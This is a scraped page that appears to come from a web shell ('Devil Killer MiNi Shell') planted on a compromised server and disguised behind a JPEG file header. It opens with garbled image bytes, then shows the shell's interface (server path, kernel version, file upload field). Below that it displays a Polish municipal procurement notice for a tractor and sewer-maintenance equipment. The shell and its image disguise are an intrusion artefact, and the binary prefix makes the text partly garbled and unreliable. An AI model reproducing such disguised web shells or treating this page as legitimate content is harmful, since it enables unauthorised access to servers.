JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230519/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20230519/0022544401-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Zakup i dostawa ciągnika wraz z zestawem maszyn i urządzeń niezbędnych do utrzymania sieci kanalizacji sanitarnej w ramach zadania. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA CIASNA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 151398416</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Nowa 1a</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Ciasna</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">42-793</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL228 - Bytomski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">343572773</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gmina@ciasna.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">ciasna.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zakup i dostawa ciągnika wraz z zestawem maszyn i urządzeń niezbędnych do utrzymania sieci kanalizacji sanitarnej w ramach zadania. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-7016d674-f643-11ed-b70f-ae2d9e28ec7b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00225444</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-05-19</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://josephine.proebiz.com/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://josephine.proebiz.com/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	Postępowanie o udzielenie zamówienia prowadzone jest w języku polskim.<br/>2.	JOSEPHINE to aplikacja internetowa znajdująca się na domenie https://josephine.proebiz.com, która jest przeznaczona do elektronicznej komunikacji między zamawiającym a wykonawcą w rozumieniu ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (Dz.U. z 2022 r., poz. 1710 z późn. zm.).<br/>3.	Zamawiający będzie komunikował się z wykonawcami za pośrednictwem modułu komunikacyjnego systemu JOSEPHINE. Złożenie oferty, złożenie wniosku o dopuszczenie do udziału, złożenie wniosku o wyjaśnienie dokumentacji przetargowej, uzupełnienie kwalifikacji, wyjaśnienie ofert, zgłaszanie sprzeciwu, nastąpi pomiędzy zainteresowaną stroną (zwana dalej „wykonawcą”) i Zamawiającym wyłącznie drogą elektroniczną w języku polskim oraz w sposób gwarantujący kompletność danych zawartych we wszystkich dokumentach, w tym ochronę danych poufnych i osobowych. Ta metoda komunikacji dotyczy wszelkiej komunikacji elektronicznej między Zamawiającym a Wykonawcą, w tym komunikacji w dynamicznym systemie zakupów (zwanym dalej „DSZ”).<br/>4.	Aby bezproblemowo korzystać z systemu JOSEPHINE, konieczne jest korzystanie <br/>z komputera podłączonego do internetu i przeglądarki internetowej. Szczegółowe informacje dotyczące wymagań technicznych znajdują się pod adresem<br/> https://store.proebiz.com/docs/josephine/pl/Wymagania_techniczne_sw_JOSEPHINE.pdf</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1-2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawach swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L119 z 04.05.2016), zwanego dalej „RODO”, informuję, że:<br/>•	Administratorem Pani/Pana danych osobowych jest Wójt Gminy Ciasna z siedzibą w |Ciasnej przy ul. Nowej 1a;<br/>•	w zakresie danych osobowych, można kontaktować się z Inspektorem Ochrony Danych Osobowych w Urzędzie Gminy Ciasna pod adresem: aleksandra@eduodo.pl lub iod@eduodo.pl;<br/>• Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego (pn Zakup i dostawa ciągnika wraz z zestawem maszyn i urządzeń niezbędnych do utrzymania sieci kanalizacji sanitarnej );<br/>•	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 ustawy Pzp, oraz podmiotom świadczącym usługi na rzecz Gminy Ciasna;<br/>•	Pani/Pana dane osobowe będą przechowywane, przez okres 5 lat od dnia zakończenia postępowania o udzielenie zamówienia, chyba że przepisy szczególne stanowią inaczej;<br/>•	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego. Konsekwencje niepodania określonych danych wynikają z ustawy Pzp;<br/>•	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane <br/>w sposób zautomatyzowany, stosownie do art. 22 RODO;<br/>•	posiada Pani/Pan:<br/>o	prawo dostępu do danych osobowych Pani/Pana dotyczących,<br/>o	prawo do sprostowania Pani/Pana danych osobowych*,<br/>o	prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO**,<br/>o	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO,<br/>•	nie przysługuje Pani/Panu:<br/>o	prawo do usunięcia danych osobowych,<br/>o	prawo do przenoszenia danych osobowych,<br/>o	prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest realizacja obowiązku prawnego ciążącego na Administratorze.<br/>* Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Prawo zamówień publicznych (Pzp).<br/>** Wyjaśnienie: zgodnie z art. 19 ust. 3 ustawy Pzp wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RGK.SW.271.2.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 280000 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> I.	Przedmiot zamówienia obejmuje:<br/>a.	ciągnik rolniczy o mocy 60,3 KM<br/>b.	wóz asenizacyjny o pojemności 4 000 l<br/>c.	zamiatarka o długości 200 cm<br/>Ciągnik rolniczy do obsługi systemów oczyszczania ścieków <br/>SILNIK: <br/>Silnik wysokoprężny 2,9 l o mocy 60,3 KM przy 2100 obr./min zgodnie z 97/68EC Stage V z certyfikatem zgodności z dyrektywami emisji spalin Stage V3-cylindrowy silnik z turbodoładowaniem i Intercoolerem. <br/>Filtr powietrza typu suchego z wkładem zabezpieczającym. Tłumik pod maską z pionową i poziomą rurą wydechową. Standardowy zestaw zimnego rozruchu. <br/>Niezamarzający płyn chłodzący. Zbiornik paliwa 82 l <br/>OŚ TYLNA: <br/>Oś tylna kołnierzowa. Zwolnice planetarne.<br/>UKŁAD KIEROWNICZY I HAMULCE:<br/>Hydrostatyczny układ kierowniczy ze wspomaganiem. Hydraulicznie uruchamiane hamulce tarczowe Mokre samo-wyrównujące i samonastawne.<br/>UKŁAD HYDRAULICZNY: <br/>Układ hydrauliczny z otwartym przepływem w położeniu neutralnym. Pompa zębata typu tandem 66,0 l/min przy prędkości nominalnej 2100 obr./min. Standardowy pojedynczy tylny zawór hydrauliki zewnętrznej dwustronnego działania EQRL (elektryczny układ szybkiego podnoszenia i opuszczania) <br/>montowany na prawej konsoli — tylny błotnik nie zamontowany.<br/>WAŁ ODBIORU MOCY: <br/>Niezależny &#34;aktywny&#34; tylny WOM 540 obr./min przy 2100 obr./min. silnika Niezależny &#34;aktywny&#34; tylny WOM 540E obr./min przy 1605 obr./min silnika. Ostrzeżenie bezpieczeństwa dotyczące obecności operatora — WOM Przełącznik włączania WOM / przełącznik pomijania położenia postojowego. <br/>PODNOŚNIK, UKŁAD ZAWIESZENIA I ZACZEP ROLNICZY: <br/>Tylny podnośnik z regulacją pozycyjną, regulacją siłową i regulacją prędkości opuszczania 3-punktowy układ zawieszenia (kategoria II) z kulami stałymi <br/>Ograniczniki bocznych wychyleń. <br/>Regulowany wychylny zaczep rolniczy EQRL (elektryczny układ szybkiego podnoszenia i opuszczania) montowany na prawej konsoli — tylny błotnik nie zamontowany. <br/>UKŁAD ELEKTRYCZNY: <br/>Układ elektryczny 12 V Jeden akumulator 85 Ah (ciągnik z kabiną) Rozlega się sygnał dźwiękowy po obróceniu kluczyka w położenie uruchamiania ciągnika. Alternator 110 A (ciągnik z kabiną)3-pinowe gniazdo 12 V (ciągnik z kabiną)7-pinowe gniazdo elektryczne EEC. Sygnał dźwiękowy. <br/>ŚWIATŁA: <br/>Dwa przednie reflektory halogenowe ruchu prawostronnego. Dwa przednie światła postojowe i migające ostrzegawcze Dwa światła postojowe, hamowania i migające ostrzegawcze na tylnych błotnikach Światło tablicy rejestracyjnej. Funkcja powrotu do domu. <br/>RÓŻNE: <br/>Odchylana maska jednoczęściowa. Przedni obciążnik podstawowy 66 kg. <br/>Skrzynka narzędziowa montowana na pomoście Przekładnia 12F / 12R PowrReverser (PR), prędkość maksymalna: 35 km/h, 4 synchronizowane biegi (3 zakresy bez synchronizacji) po lewej stronie.<br/>Dźwignia zmiany kierunku jazdy na kolumnie kierowniczej po prawej stronie.<br/>Dźwignie przełączania biegów i zakresów po lewej stronie dla ciągników z izolowanym stanowiskiem operatora bez kabiny.<br/>Elektrohydrauliczne załączanie WOM ,Elektrohydrauliczne załączanie MFWD. Mechaniczne załączanie blokady mechanizmu różnicowego. Hamulec awaryjny i zapadka postojowa.<br/>Przełącznik bezpieczeństwa neutralnego rozruchu. MFWD (napęd na 4 koła).<br/>Stała, wzmocniona, niezamknięta oś MFWD z układem kierowniczym ze wspomaganiem.<br/>Osłony zapobiegające owijaniu się o wał napędowy MFWD. Brak blokady mechanizmu różnicowego. EH MFWD. <br/>Kabina z nagrzewnicą i wentylacją i klimatyzacją.<br/>Stała przednia szyba i wycieraczka przedniej szyby. Otwierane okna boczne i tylne<br/>Kierownica bez regulacji z przekładnią 9x3. Pochylana i teleskopowa kierownica z przekładniami PowrReverser. Wyświetlacz wielofunkcyjny ze wskazaniem prędkości, godzin pracy oraz prędkości obrotowej WOM. Tapicerka z 3 uchwytami na napoje i jednym schowkiem<br/>Uchwyty na napoje. Przygotowanie do radia z CD, zamontowane głośniki<br/>4 światła robocze (po 2 z przodu i z tyłu). 2 regulowane lusterka zewnętrzne<br/>Stalowe tylne błotniki. Siedzisko z amortyzacją pneumatyczną (w ciągnikach z kabiną)<br/>Siedzisko Grammer. Zwijany pas bezpieczeństwa. Odchylane oparcie<br/>Składany podłokietnik. Pionowy wydech w słupku narożnym (kabina IIIB + Etap V)<br/>2 tylne zawory hydrauliki zewnętrznej (SCV) podwójnego działania z szybkozłączami, z blokadą w położeniu pływającym. WOM 540/540E. Podnośnik JD z mechanizmem EQRL<br/>Hydrauliczny układ kierowniczy ze wspomaganiem. <br/>Opony tylne 420/85R28(16.9R28)<br/>Opony przednie 280/85 R24 (11.2 R24)<br/>Rozstaw osi: 2050mm<br/>Całkowita długość z maską i zaczepem: 3640mm<br/>Wysokość od środka tylnej osi do dachu: 1760mm<br/>Masa całkowita: 3320kg<br/>Maksymalna dopuszczalna masa: 5100kg<br/>Maksymalny udźwig w punkcie zaczepowym: 1800kg<br/>TUZ: kategoria:II<br/>Przedni TUZ i przedni Wał Odbioru Mocy (WOM)<br/>Wóz asenizacyjny o pojemności 4 000 l <br/>Zbiornik <br/>➢ zbiornik obustronnie ocynkowany ogniowo<br/>➢ pasywacja zbiornika chroniąca świeży ocynk przed działaniem gnojowicy<br/>➢ tylny właz ø500mm (w T507/2), ø700mm (w T507/1, T507/3, T507/6) - pokrywa włazu na zawiasie <br/>➢ rurowy wskaźnik napełnienia z wziernikiem<br/>➢ króciec spustowy z zaworem 1 ½ ̎- w najniższym punkcie zbiornika<br/>➢ wziernik 4 ̎na tylnej dennicy<br/>Konstrukcja wozu: samonośna lub ramowa<br/>➢ SAMONOŚNA – dyszel zamontowany na wzmocnionych podporach pod zbiornikiem, ocynkowany ogniowo.<br/>➢ RAMOWA – zbiornik osadzony na ramie wykonanej z kształtownika zamkniętego<br/>➢ zaczep wymienny – przykręcany ø50m<br/>➢ mechanicznie regulowana stopka podporowa<br/>Zestaw kołowy jednoosiowy, dwa koła<br/>➢ ogumienie <br/>➢ błotniki <br/>➢ układ hamulcowy pneumatyczny dwuprzewodowy z 4-stopniową regulacją siły hamowania<br/>➢ hamulec ręczny postojowy<br/>Sprężarka <br/>➢ napęd 540 obr/min lub 1000 obr/min - na życzenie<br/>➢ zbrojone węże odporne na temperaturę łączące armaturę<br/>➢ zabezpieczenie przed przelaniem za pomocą zaworu dwukulowego na szczycie zbiornika oraz syfon z wziernikiem<br/>➢ manowakuometr<br/>➢ dwa zawory bezpieczeństwa: nadciśnieniowy do 0,05 MPa oraz podciśnieniowy do -0,05 MPa<br/>➢ odolejacz – mokry filtr powietrza, tłumik wyciszający pracę kompresora<br/>Króćce ssawne 4 ̎o ø110mm <br/>➢ główny króciec spustowy w pokrywie tylnego włazu 4 ̎- z zasuwą hydrauliczną 4 ̎<br/>➢ z przodu z lewej i prawej strony – zaślepiony, przygotowany pod montaż zasuwy ręcznej<br/>➢ z tyłu króciec - zaślepiony, przygotowany pod montaż zasuwy ręcznej<br/>Instalacja elektryczna 12V i oświetleniowa <br/>Wąż 4 ̎(ø110)<br/>➢ uchwyty transportowe na wąż ssawny<br/>➢ wąż z koszem ssącym – chroniący przed zassaniem dużych elementów<br/>➢ długość węża ssawnego-6mb.<br/>Urządzenie rozlewające<br/>➢ łyżka rozlewająca profilowana, szerokość rozlewania do 14m<br/>Świadectwo homologacji<br/>➢ umożliwiające rejestrację oraz poruszanie się po drogach publicznych<br/>WAŁEK PRZEKAŹNIKA MOCY<br/><br/>Zamiatarka o długości 200 cm <br/>	koła gumowe pełne<br/>	złącza hydrauliczne<br/>	mocowanie EURO, SMS, TUZ<br/>	pojemność zbiornika 250 ltr. (200ltr robocza)<br/>	montaż na przednim TUZIE<br/>	szczotka boczna<br/>	pojemnikiem na odpady <br/>	regulacją hydrauliczną kąta pracy<br/>	szczotki polipropylenowo stalowe<br/>	funkcja zraszania </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">16710000-5 - Ciągniki rolnicze pedałowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">21.1.	W ofercie Wykonawca zobowiązany jest podać cenę za wykonanie całego przedmiotu zamówienia w złotych polskich (PLN), z dokładnością do 1 grosza, tj. do dwóch miejsc po przecinku.<br/>21.2.	W cenie należy uwzględnić wszystkie wymagania określone w niniejszej SWZ oraz wszelkie koszty, jakie poniesie Wykonawca z tytułu należytej oraz zgodnej z obowiązującymi przepisami realizacji przedmiotu zamówienia, a także wszystkie potencjalne ryzyka ekonomiczne, jakie mogą wystąpić przy realizacji przedmiotu zamówienia.<br/>21.3.	Rozliczenia między Zamawiającym a Wykonawcą prowadzone będą w złotych polskich z dokładnością do dwóch miejsc po przecinku.<br/>21.4.	Wykonawca zobowiązany jest zastosować stawkę VAT zgodnie z obowiązującymi przepisami ustawy z 11 marca 2004 r. o podatku od towarów i usług.<br/>21.5.	Jeżeli złożona zostanie oferta, której wybór prowadziłby do powstania u Zamawiającego obowiązku podatkowego zgodnie z ustawą z 11 marca 2004 r. o podatku od towarów i usług, dla celów zastosowania kryterium ceny Zamawiający doliczy do przedstawionej w tej ofercie ceny kwotę podatku od towarów i usług, którą miałby obowiązek rozliczyć.<br/>21.6.	Wykonawca składając ofertę zobowiązany jest:<br/>1)	poinformować Zamawiającego, że wybór jego oferty będzie prowadził do powstania u Zamawiającego obowiązku podatkowego;<br/>2)	wskazać nazwę (rodzaj) towaru lub usługi, których dostawa lub świadczenie będą prowadziły do powstania obowiązku podatkowego;<br/>3)	wskazać wartości towaru lub usługi objętego obowiązkiem podatkowym Zamawiającego, bez kwoty podatku;<br/>4)	wskazać stawkę podatku od towarów i usług, która zgodnie z wiedzą Wykonawcy, będzie</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 7.1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu oraz spełniają warunki udziału w postępowaniu i wymagania określone w niniejszej SWZ.<br/>7.2.	Zamawiający, na podstawie art. 112 ustawy Pzp 